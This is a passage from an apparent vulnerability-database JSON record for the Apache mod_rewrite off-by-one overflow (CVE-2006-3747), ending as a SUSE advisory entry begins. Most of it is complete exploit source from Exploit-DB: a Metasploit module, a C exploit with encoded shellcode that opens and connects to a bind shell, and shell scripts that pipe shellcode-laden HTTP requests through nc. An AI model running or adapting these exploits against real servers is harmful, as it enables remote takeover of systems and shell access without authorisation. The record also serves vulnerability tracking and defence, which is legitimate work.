\r\n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\\r\n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\\r\n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\\r\n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\\r\n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\\r\n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\\r\n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\\r\n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\\r\n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\\r\n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\\r\n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\\r\n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\\r\n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\\r\n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\\r\n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\\r\n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\\r\n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\\r\n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\\r\n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\\r\n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\\r\n\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\\r\n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\\r\n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\\r\n\\x73\\x32\\x73\\x
31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\\r\n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\\r\n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\\r\n\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\\r\n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\\r\n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\\r\n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\\r\n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\\r\n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\\r\n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\\r\n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\\r\n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\\r\n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\\r\n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\\r\n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\\r\n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\\r\n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\\r\n\"'`\\\r\nHTTP/1.0\\r\\n\\\r\nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80\r\n\r\n# milw0rm.com [2007-04-07]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3680/"}, {"lastseen": "2016-02-02T06:26:15", "description": "Apache module mod_rewrite LDAP protocol Buffer Overflow. CVE-2006-3747. 
Remote exploit for windows platform", "published": "2010-02-15T00:00:00", "type": "exploitdb", "title": "Apache module mod_rewrite LDAP protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2010-02-15T00:00:00", "id": "EDB-ID:16752", "href": "https://www.exploit-db.com/exploits/16752/", "sourceData": "##\r\n# $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the mod_rewrite LDAP protocol scheme handling\r\n\t\t\t\tflaw discovered by Mark Dowd, which produces an off-by-one overflow.\r\n\t\t\t\tApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\r\n\t\t\t\tThis module requires REWRITEPATH to be set accurately. 
In addition,\r\n\t\t\t\tthe target must have 'RewriteEngine on' configured, with a specific\r\n\t\t\t\t'RewriteRule' condition enabled to allow for exploitation.\r\n\r\n\t\t\t\tThe flaw affects multiple platforms, however this module currently\r\n\t\t\t\tonly supports Windows based installations.\r\n\t\t\t},\r\n\t\t\t'Author' => 'patrick',\r\n\t\t\t'Version' => '$Revision: 8498 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3747' ],\r\n\t\t\t\t\t[ 'OSVDB', '27588' ],\r\n\t\t\t\t\t[ 'BID', '19204' ],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['win'], # 'linux'],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 636,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ], # patrickw tested OK 20090310 win32\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 28 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'version' => '1.1',\r\n\t\t}, 2)\r\n\r\n\t\tif (res.to_s =~ /Apache/) # This could be smarter.\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# On Linux Apache, it is possible 
to overwrite EIP by\r\n\t\t# sending ldap://<buf> ... TODO patrickw\r\n\r\n\t\ttrigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'\r\n\r\n\t\tprint_status(\"Sending payload.\")\r\n\t\tsend_request_raw({\r\n\t\t\t\t'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,\r\n\t\t\t\t'version' => '1.0',\r\n\t\t\t\t}, 2)\r\n\t\thandler\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16752/"}, {"lastseen": "2016-01-31T19:51:13", "description": "Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3). CVE-2006-3747. Remote exploit for windows platform", "published": "2007-05-26T00:00:00", "type": "exploitdb", "title": "Apache 2.0.58 mod_rewrite Remote Overflow Exploit win2k3", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-05-26T00:00:00", "id": "EDB-ID:3996", "href": "https://www.exploit-db.com/exploits/3996/", "sourceData": "/*\r\napache mod rewrite exploit (win32)\r\n\r\nBy: fabio/b0x (oc-192, old CoTS member)\r\n\r\nVuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\r\n\r\nCode: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)\r\n original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also\r\n was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/\r\n\r\nUsage: ./apache hostname rewrite_path\r\n\r\nGreetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\r\n\r\nExample: ./apache 192.168.0.253 test\r\n[+]Preparing payload\r\n[+]Connecting...\r\n[+]Connected\r\n[+]Sending...\r\n[+]Sent\r\n[+]Starting second stage...\r\n[+]Connecting...\r\n[+]Connected\r\n[+]Sending...\r\n[+]Sent\r\n[+]Connecting to shell\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\Program 
Files\\Apache Group\\Apache2>exit\r\nexit\r\n[+]Owned\r\n*/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n#define PORT 80 \r\n#define PORT2 4444\r\n#define MAXDATASIZE 1024\r\nchar get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\";\r\nchar shellcode[]= \r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\"\r\n\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\"\r\n\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\"\r\n\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\"\r\n\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\"\r\n\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\"\r\n\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\"\r\n\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\"\r\n\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\"\r\n\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\"\r\n\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\"\r\n\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\"\r\n\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\"\r\n\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\"\r\n\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\"\r\n\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\
x6c\\x4e\\x70\\x4e\\x44\"\r\n\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\"\r\n\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\"\r\n\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\"\r\n\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\"\r\n\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\"\r\n\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\"\r\n\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\"\r\n\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\"\r\n\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\"\r\n\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\"\r\n\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\"\r\n\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\"\r\n\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\"\r\n\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\"\r\n\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\"\r\n\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\"\r\n\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\"\r\n\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\"\r\n\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\"\r\n\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\"\r\n\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\"\r\n\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\";\r\n\r\n\r\nchar finish[]= \"HTTP/1.0\\r\\nHost: 
\";\r\n\r\nchar payload2[]=\r\n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\"\r\n\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\"\r\n\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\"\r\n\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\"\r\n\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\"\r\n\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\"\r\n\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\"\r\n\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\"\r\n\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\"\r\n\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\"\r\n\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\"\r\n\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\"\r\n\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\"\r\n\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\"\r\n\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\"\r\n\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\"\r\n\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\"\r\n\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\"\r\n\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\"\r\n\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\"\r\n\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\"\r\n\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int sockfd, numbytes; 
\r\n char buf[MAXDATASIZE];\r\n struct hostent *he;\r\n struct sockaddr_in their_addr;\r\n printf(\" Exploit: apache mod rewrite exploit (win32)\\n\"\r\n \" By: fabio/b0x (oc-192, old CoTS member)\\n\"\r\n \"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\"\r\n );\r\n if (argc != 3) {\r\n printf(\" Usage: ./apache hostname rewrite_path\\n\");\r\n exit(1);\r\n }\r\n printf(\"\\n[+]Preparing payload\\n\");\r\n\r\n char payload[748];\r\n sprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]);\r\n\r\n printf(\"[+]Connecting...\\n\");\r\n if ((he=gethostbyname(argv[1])) == NULL) {\r\n printf(\"[-]Cannot resolv hostname...\\n\");\r\n exit(1);\r\n }\r\n if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n printf(\"[-]Socket error...\\n\");\r\n exit(1);\r\n }\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(PORT); \r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n memset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero);\r\n if (connect(sockfd, (struct sockaddr *)&their_addr,\r\n sizeof(struct sockaddr)) == -1) {\r\n printf(\"[-]Unable to connect\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Connected\\n[+]Sending...\\n\");\r\n if (send(sockfd, payload, strlen(payload), 0) == -1){\r\n printf(\"[-]Unable to send\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Sent\\n\");\r\n close(sockfd);\r\n printf(\"[+]Starting second stage...\\n\");\r\n sleep(3);\r\n printf(\"[+]Connecting...\\n\");\r\n if ((he=gethostbyname(argv[1])) == NULL) { \r\n printf(\"[-]Cannot resolv hostname...\\n\");\r\n exit(1);\r\n }\r\n if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n printf(\"[-]Socket error...\\n\");\r\n exit(1);\r\n }\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(PORT2);\r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n memset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero);\r\n if 
(connect(sockfd, (struct sockaddr *)&their_addr,\r\n sizeof(struct sockaddr)) == -1) {\r\n printf(\"[-]Unable to connect\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Connected\\n[+]Sending...\\n\");\r\n if (send(sockfd, payload2, strlen(payload2), 0) == -1){\r\n printf(\"[-]Unable to send\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Sent\\n[+]Connecting to shell\\n\");\r\n close(sockfd);\r\n\r\n\r\n sleep(3);\r\n int exec;\r\n char what[1024];\r\n sprintf(what,\" nc -w 10 %s 4445\",argv[1]);\r\n exec=system(what);\r\n if (exec!=0){\r\n printf(\"[-]Not hacked\\n\");\r\n } else {\r\n printf(\"[+]Owned\\n\");\r\n }\r\n exit(1);\r\n} \r\n\r\n// milw0rm.com [2007-05-26]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3996/"}, {"lastseen": "2016-01-31T15:49:08", "description": "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC. CVE-2006-3747. Dos exploits for multiple platform", "published": "2006-08-21T00:00:00", "type": "exploitdb", "title": "Apache < 1.3.37 / 2.0.59 / 2.2.3 - mod_rewrite Remote Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "id": "EDB-ID:2237", "href": "https://www.exploit-db.com/exploits/2237/", "sourceData": "#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. 
Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e \"mod_rewrite apache off-by-one overflow\"\r\necho \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo \"Usage: $0 webserver\"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6\\\r\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\r\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\r\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\r\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\r\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\r\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\r\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\r\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\r\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\r\nHost: $host\\r\\n\\r\\n\" | nc $host 80\r\n\r\n# milw0rm.com [2006-08-21]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2237/"}], "suse": [{"lastseen": "2016-09-04T11:56:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The following security problem was fixed in the Apache and Apache 2 web servers:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2006-07-28T14:21:14", "published": "2006-07-28T14:21:14", "id": "SUSE-SA:2006:043", "href": 